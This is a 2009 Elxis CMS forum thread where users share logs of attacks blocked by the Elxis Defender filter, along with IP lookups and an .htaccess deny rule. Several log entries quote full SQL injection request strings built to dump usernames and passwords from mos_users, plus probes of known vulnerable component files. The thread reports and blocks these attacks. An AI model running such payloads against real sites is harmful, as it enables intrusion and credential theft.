Elxis CMS Forum
Support => Security => Topic started by: jimmyz on May 18, 2009, 18:19:09
-
ATTACKER IP ADDRESS: 66.7.205.7
Requested URI: /en/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php
Requested URI: /greek/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php
Requested URI: /english/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
Another one bites the dust. :P
-
I had the same attacks from the same ip !!
Elxis show him the exit !! ;D
-
me too.... same date
-
I visited 2 web sites to day, not made with Elxis, for some reason. Really good looking sites, one of a radio station and an other one of an online shop. Both were made with commercial applications (not open source). Both sites have serious security problems. Any one can take these sites down, any time, with simple SQL injection. Even if you don't know how I can show you how and you can then do it by yourself in minutes. I wonder why people pay so much money to build sites in insecure environments and with insecure platforms. OK, I can understand that the one that paid to built his site is not a security specialist, but those that built and use the software don't see that the software is insecure? No one tests the application? No one tries strange queries? No input validation? No debug? Nothing?
I believe that the 90% of the custom made dynamic web sites (php, asp, etc) can be easily hacked because they have been built by inexperienced and careless developers. The solution to this problem is to use well known open source platforms, not specifically Elxis if you don't like it, as they are updated continuously, used in thousands of web sites and have been approved secure enough. For us, Elxis is our proposal to the people if they want to have a modern, secure and flexible web site.
Note: I use to contact the owners of the sites I found as insecure. It is a nice feeling to inform them that their lovely web site is finally not too good... :D
-
???No one tries strange queries? No input validation? No debug? ???
how you can see all that john? tell us some tips how can we search in that way one site .........(mas vazeis sto tripaki kai emeis den mporoume na to xaroume auto pou vlepeis)
-
I like that in a pm ;D ;D ;D
-
Security is always a big concern... I 'd take the course too! ::)
Thanks to Elxis Defender, we can joke arround with each other... But thing of the others... :'(
-
ATTACKER IP ADDRESS: 85.240.231.83 (blocked)
Requested URI: /index.php?Itemid=union/**/select/**/SC4NN3R/*
DATE: 19-05-2009 19:55:38
Attack was logged
All the filter works !!
-
Note that on the requested URI you don't see the full attack but only the $_GET query.
Elxis Defender checks/blocks $_GET, $_POST, $_REQUEST and even $_COOKIE variables.
The Defender's logger will tell you the exact filter used to block the attack.
-
I cought another one!
ATTACKER IP ADDRESS: 70.85.181.50
Requested URI: /mod_cbsms_messages.php
filter that worked: mosConfig_
Host name: yenko.websitewelcome.com.
Location: Dallas, TX, UNITED STATES
-
The name servers is form the hostgator and the planet data center.
-
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /com_gallery/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
DATE: 26-05-2009 14:58:05
-
I thing someone testing :) The same ip and 2 min before yours
ATTACKER IP ADDRESS: 65.254.224.34 (blocked)
Requested URI: /com_newsletter/index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 14:56:09
Attack was logged
-
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /com_downloads/index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 19:44:33
Attack was logged
Site turned offline for 5 seconds
Another attack for today . WHAT IS THIS IP ? WHERE IS IT ?
-
WHAT IS THIS IP ? WHERE IS IT ?
USA
MASSACHUSETTS
BURLINGTON
THE ENDURANCE INTERNATIONAL GROUP INC
Nothing to worry about, always try to notice mos prefix... this means that is just some script written for mambo. Some kids are playing.
-
You can add a deny rule in your .htaccess file to block such IPs permanent.
order allow,deny
deny from 65.254.224.34
allow from all
-
I notice that all this attack are based to our signatures at forum. :)
-
Just for the record, the same one attacked two sites, with 1 sec difference:
ATTACKER IP ADDRESS: 65.254.224.34
Requested URI: /en/com_downloads/logos/index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-05-2009 19:46:28
Elxis slapped the door on his face!
-
This is the solution i had the same problem.
You can add a deny rule in your .htaccess file to block such IPs permanent.
order allow,deny
deny from 65.254.224.34
allow from all
-
This is the solution i had the same problem.
The logged attack is not the problem! Think clever ;)
-
And another one:
ATTACKER IP ADDRESS: 82.192.68.25
Requested URI: /mod_cbsms_messages.php
DATE: 04-06-2009 15:56:21